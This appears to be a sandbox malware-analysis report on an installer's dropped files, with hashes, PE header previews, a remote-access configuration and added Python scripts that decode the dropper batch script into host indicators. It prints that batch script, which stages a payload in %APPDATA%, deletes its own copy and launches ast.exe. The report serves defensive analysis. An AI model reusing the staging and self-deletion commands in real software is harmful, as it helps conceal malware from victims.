Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2236144
Entropy (8bit):5.624149670958732
Encrypted:false
SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
MD5:BCCF6A5C2595EEA84533692BB788D8BB
SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):586
Entropy (8bit):5.193353768565217
Encrypted:false
SSDEEP:12:LzSeQNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:HSeWlcMypJD5KxkiaJosBq
MD5:CAA0C19D802D86B5A6B290897AA864EE
SHA1:01C139425983B9EC2A8FE42C9D685D1193D5A8BB
SHA-256:EDEECC1090C314D7397B171CD09E1C208FCCE3B580794BAC425475E4292629FA
SHA-512:95B595038F720A45449E77E121B0AF3FFA251034EFD6F187C8572C54F667D11F467AF6A5F062F50B60C8001645CA33B5F204482753AF72BDD2AA3A3834BD2C35
Malicious:false
Preview:[config]..Security.FixPass=96E79218965EB72C92A549DD5A330112..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):713456
Entropy (8bit):6.620067101616198
Encrypted:false
SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
MD5:96D413CAAF8C7793A96EF200F6695922
SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):172216
Entropy (8bit):6.698242571688099
Encrypted:false
SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
MD5:CF1169A87FE6266C7B457A2424DA69DA
SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:data
Category:dropped
Size (bytes):43
Entropy (8bit):5.286729870981167
Encrypted:false
SSDEEP:3:SYMGa4VOUbLDFwozJO+n:SBU/Bwoz7n
MD5:33118193A9FD63FBCF60AE73FC60199E
SHA1:8DAFC111E44FABAE3EAD8325BB03E97871393D99
SHA-256:1E0DB7EB8AA0E8D9203FBB39753E82D6077A867ADF93D438CE24333686793159
SHA-512:647F151D68094BCCC313006C6BCA06505A2EBDE58C014901D71FFED01285172F124EF0FA400A6481D30BFBA021C674959AF0D2061BB11466A28BB79C096A20E5
Malicious:false
Preview:.>..i"_(..9E..+.S-..;.f.-.si..MZ......c:...
Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1724088
Entropy (8bit):6.573221633911959
Encrypted:false
SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
MD5:E0E559010A1CC7CB6B6F754E8833A156
SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):395
                                                                                                                          Entropy (8bit):4.596567576097278
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:hmR9ooW9rw49edspB7utcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvWVOzwaowQ4:w7Q249edaBS7jfxmfJ8WsQwH
                                                                                                                          MD5:21138C5F0FC42E27B57CBADC4CFCB7B7
                                                                                                                          SHA1:EBC7FB05FD67B43925EC4EE2A43A2F3152712B28
                                                                                                                          SHA-256:C8D896D8DAE872D0FF7ED407E9706E19F798FBADBA7AF7EF48E5EDDA4BF05C23
                                                                                                                          SHA-512:20D832E675D2AAB97DF7FC10BAD055F96327F782224C0A1C0F10C4D7CF01CCC7428AB934DA889935C2E67D6FAC959C1F52D796314988168844C5F079B55D67F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:@echo off..set "StartDirName=fat" ..set "TempDirName=qilq" ..set "BatchName=g3ll5lm.bat" ..set "ProcName=ast.exe" ......mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..
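The batch file above is the stage that moves the installer's payload out of the temp directory and launches it. Its preview is readable because the report draws every non-printable byte as '.', so each CR LF line ending shows up as '..'. The following script is an added example for this page, not Joe Sandbox code and not code from the sample: it rebuilds the script lines from the preview string copied from the report, tracks the `set "NAME=VALUE"` variables the way cmd.exe would, expands them into the commands that actually run, and pulls out the paths an analyst would turn into host indicators. `%appdata%` and `%temp%` are fixed to the sandbox user seen in the report's own `C:\Users\user\...` paths and `<batch_dir>\` stands in for `%~dp0`, because the report does not show where the batch file was written; both are assumptions so the script runs offline.

```python
"""Rebuild the dropped batch file from its report preview and pull out the
staging paths it uses.

Added example for this report page: not Joe Sandbox code and not code from
the sample. PREVIEW is the report's "Preview:" field for the 395-byte batch
file; non-printable bytes are drawn as '.', so each CR LF appears as '..'.
SANDBOX_ENV and the "<batch_dir>\\" placeholder for %~dp0 are assumptions.
"""
import re

# Copied from the report's Preview field (non-printable bytes rendered as '.').
PREVIEW = (
    r'@echo off..set "StartDirName=fat" ..set "TempDirName=qilq" '
    r'..set "BatchName=g3ll5lm.bat" ..set "ProcName=ast.exe" ......'
    r'mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" '
    r'"%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"'
    r'..start "" "%appdata%\%StartDirName%\%ProcName%"'
    r'..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..'
)

# Assumed environment: the user name matches the report's Temp path, and
# "<batch_dir>\" is a placeholder for the directory the batch file ran from.
SANDBOX_ENV = {
    "appdata": r"C:\Users\user\AppData\Roaming",
    "temp": r"C:\Users\user\AppData\Local\Temp",
    "~dp0": "<batch_dir>\\",
}

SET_RE = re.compile(r'^set\s+"([^=]+)=([^"]*)"\s*$', re.IGNORECASE)


def preview_to_lines(preview: str) -> list:
    """Split the '.'-rendered preview back into script lines.

    Splitting on '..' is safe here only because the script text itself
    never contains two consecutive dots.
    """
    return [ln.rstrip() for ln in preview.split("..") if ln.strip()]


def expand(text: str, env: dict) -> str:
    """Left-to-right cmd.exe style expansion of %var%, %% and %~dp0."""
    out, i = [], 0
    while i < len(text):
        if text[i] != "%":
            out.append(text[i])
            i += 1
        elif text.startswith("%%", i):          # '%%' is a literal '%' in a .bat
            out.append("%")
            i += 2
        elif text.startswith("%~dp0", i):       # drive and path of the script
            out.append(env.get("~dp0", "%~dp0"))
            i += 5
        else:
            j = text.find("%", i + 1)
            if j == -1:                         # lone '%': keep it
                out.append(text[i:])
                break
            name = text[i + 1:j].lower()        # cmd names are case-insensitive
            out.append(env.get(name, text[i:j + 1]))
            i = j + 1
    return "".join(out)


def parse_batch(lines, env):
    """Record set "NAME=VALUE" lines; expand every other line into a command."""
    env = dict(env)
    commands = []
    for ln in lines:
        m = SET_RE.match(ln)
        if m:
            env[m.group(1).lower()] = m.group(2)
        else:
            commands.append(expand(ln, env))
    return env, commands


def staging_indicators(commands):
    """Paths worth turning into host indicators, keyed by what the script does."""
    ind = {}
    for cmd in commands:
        if m := re.match(r'mkdir\s+"([^"]+)"', cmd):
            ind["staging_dir"] = m.group(1)
        elif m := re.match(r'xcopy\s+(?:/\w\s+)*"([^"]+)"\s+"([^"]+)"', cmd):
            ind["copied_from"], ind["copied_to"] = m.group(1), m.group(2)
        elif m := re.match(r'del\s+(?:/\w\s+)*"([^"]+)"', cmd):
            ind["self_deleted"] = m.group(1)
        elif m := re.match(r'start\s+""\s+"([^"]+)"', cmd):
            ind["launched"] = m.group(1)
        elif m := re.match(r'for\s+/d\s+%\w\s+in\s+\(([^)]+)\)\s+do\s+rd\b', cmd):
            ind["removed_dir"] = m.group(1)
    return ind


if __name__ == "__main__":
    env, cmds = parse_batch(preview_to_lines(PREVIEW), SANDBOX_ENV)
    print("\n".join(cmds))
    for key, path in staging_indicators(cmds).items():
        print(f"{key:13s} {path}")
```

Run as-is, it prints the six commands with variables resolved: the script creates `%APPDATA%\fat`, copies everything from its own directory into it, deletes its own copy (`g3ll5lm.bat`) from the staging directory, launches `%APPDATA%\fat\ast.exe`, and finally removes `%TEMP%\qilq`. The `start ""` form and the self-deletion are what make the launched `ast.exe` path, rather than the batch file, the durable indicator to hunt for on other hosts.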
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):546816
                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):970912
                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1074302464
                                                                                                                          Entropy (8bit):0.007609102467218604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:1E2570A7DD0C8452B18340E4386C1FA3
                                                                                                                          SHA1:FE1D6D0D86171E8F9AE64A909C4ADCCA13267B20
                                                                                                                          SHA-256:DACBF6D62555C6A75AEEBF978388AB320D3F2B283240C936B82ABD9318ADD699
                                                                                                                          SHA-512:02951D9CD5E88D91A10524D811D5673A2A98DB5EB21E97A1273900625A932DD933B82B60B09C5FE28381890471A7B40388CA3ACD84D5FE42BF9A4B4693727F72
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...d.&d...........!...I.p...............................................................@.....................................................................V....................................................................................code....o.......p.................. ..`.data...8............t..............@....rdata..............................@..@.edata..............................@..@.reloc..V...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
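The entry above stands out from the other dropped DLLs: 1,074,302,464 bytes with an 8-bit entropy of 0.0076 and no SSDEEP in the report. Numbers like that are consistent with a small binary followed by a very large run of near-constant padding, though the report itself states only the measurements. The following script is an added example for this page, not Joe Sandbox code and not the sample's code: it implements the same 8-bit Shannon entropy the report labels "Entropy (8bit)", runs a size/entropy sanity check over the dropped-file records transcribed from this section, and estimates how much non-redundant content such a file can actually hold. The thresholds and the padding interpretation are assumptions chosen for illustration.

```python
"""Size and entropy triage over the dropped-file records of this report.

Added example for this page; not Joe Sandbox code and not the sample's code.
DROPPED is transcribed from the report's SHA-256, Size (bytes), Entropy (8bit)
and SSDEEP fields. Thresholds in triage() are illustrative assumptions.
"""
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant file, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def information_bytes(size: int, entropy: float) -> float:
    """Rough estimate of the non-redundant content in a file of this profile."""
    return size * entropy / 8.0


def triage(records, max_plausible=64 * 1024 * 1024, low_entropy=1.0):
    """Return (sha256, reasons) for records whose profile does not look like
    an ordinary PE. The size and entropy thresholds are assumptions."""
    flagged = []
    for r in records:
        reasons = []
        if r["entropy"] < low_entropy:
            est = information_bytes(r["size"], r["entropy"])
            reasons.append(f"entropy {r['entropy']:.4f}: roughly "
                           f"{est / 1e6:.2f} MB of distinct content in "
                           f"{r['size'] / 1e6:.0f} MB")
        if r["size"] > max_plausible:
            reasons.append("size far above that of a normal PE")
        if r["ssdeep_reported"] is False:
            reasons.append("no SSDEEP in the report")
        if reasons:
            flagged.append((r["sha256"], reasons))
    return flagged


# Transcribed from the report's dropped-file entries in this section.
DROPPED = [
    {"sha256": "C8D896D8DAE872D0FF7ED407E9706E19F798FBADBA7AF7EF48E5EDDA4BF05C23",
     "size": 395, "entropy": 4.596567576097278, "ssdeep_reported": True},
    {"sha256": "3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449",
     "size": 546816, "entropy": 6.657309146326691, "ssdeep_reported": True},
    {"sha256": "86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F",
     "size": 970912, "entropy": 6.9649735952029515, "ssdeep_reported": True},
    {"sha256": "DACBF6D62555C6A75AEEBF978388AB320D3F2B283240C936B82ABD9318ADD699",
     "size": 1074302464, "entropy": 0.007609102467218604, "ssdeep_reported": False},
    {"sha256": "4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6",
     "size": 2533560, "entropy": 6.236092740507617, "ssdeep_reported": True},
    {"sha256": "603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE",
     "size": 541880, "entropy": 5.766958615909, "ssdeep_reported": True},
    {"sha256": "55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576",
     "size": 370488, "entropy": 6.86993159214619, "ssdeep_reported": True},
    {"sha256": "83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47",
     "size": 2098416, "entropy": 6.277915381502377, "ssdeep_reported": True},
]


def record_from_bytes(data: bytes, label: str) -> dict:
    """Build a record in the same shape from raw bytes (e.g. a file on disk).
    SSDEEP is not computed here, so that field is left as None (unknown)."""
    return {"sha256": label, "size": len(data),
            "entropy": shannon_entropy(data), "ssdeep_reported": None}


# Constructed sample: 4 KiB of varied bytes followed by 1 MiB of zero padding,
# a scaled-down version of the profile the 1 GiB record shows.
PADDED_SAMPLE = bytes(range(256)) * 16 + b"\x00" * (1 << 20)


if __name__ == "__main__":
    records = DROPPED + [record_from_bytes(PADDED_SAMPLE, "constructed-sample")]
    for sha, reasons in triage(records):
        print(sha[:16], "|", "; ".join(reasons))
```

Only the 1 GiB record trips the check among the transcribed entries; the estimate works out to roughly 1 MB of distinct content, which is the order of magnitude of the other DLLs in this list. A practitioner should treat such a file as a candidate for carving the real PE out of the leading bytes before hashing and scanning, since many upload-based scanners cap file size well below 1 GiB; that interpretation is an inference from the numbers, not a finding stated by the report.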
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2533560
                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):541880
                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370488
                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2533560
                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2098416
                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):546816
                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................
